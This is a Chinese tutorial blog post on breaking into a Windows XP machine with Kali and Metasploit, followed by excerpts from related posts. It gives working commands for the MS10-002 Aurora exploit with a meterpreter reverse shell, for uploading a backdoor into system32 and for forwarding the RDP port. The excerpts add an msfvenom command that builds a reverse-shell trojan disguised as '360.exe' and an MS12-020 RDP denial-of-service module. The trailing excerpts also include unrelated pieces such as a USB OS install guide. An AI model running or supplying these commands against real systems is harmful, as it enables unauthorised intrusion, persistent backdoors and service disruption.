kali之入侵XP系统1

保证网络连通性,配置网络地址

第一次使用msfconsole,开启内建的数据库PostgreSQL和metasplote
开启PostgreSQL:  service postgresql start
开启metasploit:  service metasploit start  
[email protected]:~# msfconsole

查找10-002漏洞模块 search 10-002

use exploit/windows/browser/ms10_002_aurora 进行漏洞攻击

set payload windows/meterpreter/reverse_tcp 定义攻击载荷
set lhost 192.168.48.123 定义本机地址
set URIPATH / 定义url的后缀(这里我只设置了一个/)
exploit 开发

在攻击主机打开目标网站http://192.168.48.123:8080/

sessions -i 1 打开连接会话

在这里可以对系统创建用户

rdesktop  -u  administrator  -p  123  192.168.48.100:3389

1、session 查看已经成功获取的会话
可以使用session -i 连接到指定序号的meterpreter会话已继续利用
2、shell命令
3、getuid查看meterpreter注入到目标主机的进程所属用户
4、upload命令上传文件到目标主机,例如把后门程序setup.exe传到目标主机system32目录下
upload  setup.exe  C:\\windows\\system32\
5、portfwd 端口转发
例如目标主机上开启了3389,但是只允许特定IP访问,攻击主机无法连接,可以使用portfwd命令把目标主机的3389端口转发到其他端口打开
例如:portfwd  add -l  1122 -p 3389 -r  192.168.48.100
把目标主机192.168.48.100的3389端口转发到1122端口
这是只需要连接目标的1122端口就可以打开远程桌面了
rdesktop  -u  administrator  -p  123456  192.168.48.100:1122
6、sysinfo查看目标主机系统信息
7、ps 查看目标主机上运行的进程信息,结合migrate使用

时间: 2024-10-03 16:39:31

kali之入侵XP系统1的相关文章

kali之入侵XP系统3(非法关闭计算机)

保证网络连通性,配置网络 开启PostgreSQL:  service postgresql start开启metasploit:  service metasploit start [email protected]:~# msfconsole 前提目标主机3389端口开放 msf >search CVE_2012_0002 查找ms12_020漏洞msf >use auxiliary/dos/windows/rdp/ms12_020_maxchannelids 使用ms12_020漏洞ms

kali之入侵Win7系统1

写木马文件,并赋予权限 [email protected]:~#msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.48.123 lport=33389 -f exe > 360.exe[email protected]:~#chmod 777 360.exe 配置网络信息 开启PostgreSQL:  service postgresql start开启metasploit:  service metasploit start [

kali之入侵win7系统2

Metasploit是一款开源的安全漏洞检测工具.它可以帮助用户识别安全问题,验证漏洞的缓解措施,并对某些软件进行安全性评估,提供真正的安全风险情报 Metasploit软件为它的基础功能提供了多个用户接口,包括终端.命令行和图形化界面等 打开 打开 扫描主机 存活主机

kali linux 入侵window实例

我使用Kali Linux的IP地址是192.168.0.112:在同一局域网内有一台运行Windows XP(192.168.0.108)的测试电脑. 本文演示怎么使用Metasploit入侵windows xp sp3. 启动msfconsole: # msfconsole 选择一个漏洞: msf > search platform: windows xp sp3 exploit/windows/smb/ms08_067_netapi是08年发现的漏洞,等级Great. 查看某个漏洞的详细信

黑客教父郭盛华:Kali Linux黑客渗透系统为何如此重要?

Kali Linux黑客渗透系统技术有多重要?近日,中国知名黑客教父,东方联盟创始人郭盛华对Kali Linux渗透系统作出了一系列详细的视频讲解. 郭盛华说,Kali Linux是一个强大的浸透测试.开发.网络安全研究.利用的专业平台,在黑客安全以及从事网络安全工程师必须学会掌握使用,但是并不能说使用了 Kali Linux 就能成为厉害的黑客,Kali Linux是为非常有经验的人提供预安装的利用环境. 黑客教父郭盛华表示:专业黑客花费在 Windows 上面的时间才是最多的,厉害的黑客比微

监听鼠标滚轮(js+jq),xp系统下也OK

应项目需求,运用了监听滚轮的事件,发现在xp系统下使用jquery的mousewheel.js来做,会导致无论滚轮怎么滚,都只能向下滚...后面使用了原生js的,就可以了. jquery: <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="widt

搭建开源入侵检测系统Snort并实现与防火墙联动

Snort作为一款优秀的开源主机入侵检测系统,在windows和Linux平台上均可安装运行.BT5作为曾经的一款经典的渗透神器,基于 Ubuntu,里面已经预装很多的应用,比如Mysql.Apache.Snort等等.Guardian是snort的插件,通过读取snort报警日 志将入侵IP加入到Iptables中.Iptables 是与最新的 3.5 版本 Linux 内核集成的 IP 信息包过滤系统. 本文详细介绍了BT5中安装snrot NIDS并实现与iptables防火墙联动的过程.

XP系统下IIS常见的几个问题

随笔说明: 个人笔记.仅供参考 根据日常遇到的相关问题不定期增改 时间:2015年1月7日23:09 Soft:Microsoft .NET Framework 4(独立安装程序) Microsoft .NET Framework 4 可再发行组件包将安装 .NET Framework 运行时和关联文件(这些文件是运行和开发面向 .NET Framework 4 的应用程序所必需的). 版本:4File Name:dotNetFx40_Full_x86_x64.exe出版日期:2011/2/21

怎么用u盘安装xp系统

U盘装系统的确给我们带来了很大的方便,有些网友可能已经制作成了U盘启动盘,但是不知道如何使用U盘安装操作系统,今天小编就为大家分享使用U盘安装XP系统的详细方法. 1.首先到U当家官网下载最新版U盘启动盘制作工具.2.下载GHOST WIN7或GHOSTXP系统3.将下载好的GHOSTXP或GHOSTWIN7系统复制到U盘内4.将BIOS设置U盘启动,不会设置的请看:U盘装系统BIOS设置教程5.进入U当家03PE或08PE系统(推荐使用WIN8版防蓝屏)6.点击桌面的U当家智能快速装机工具7.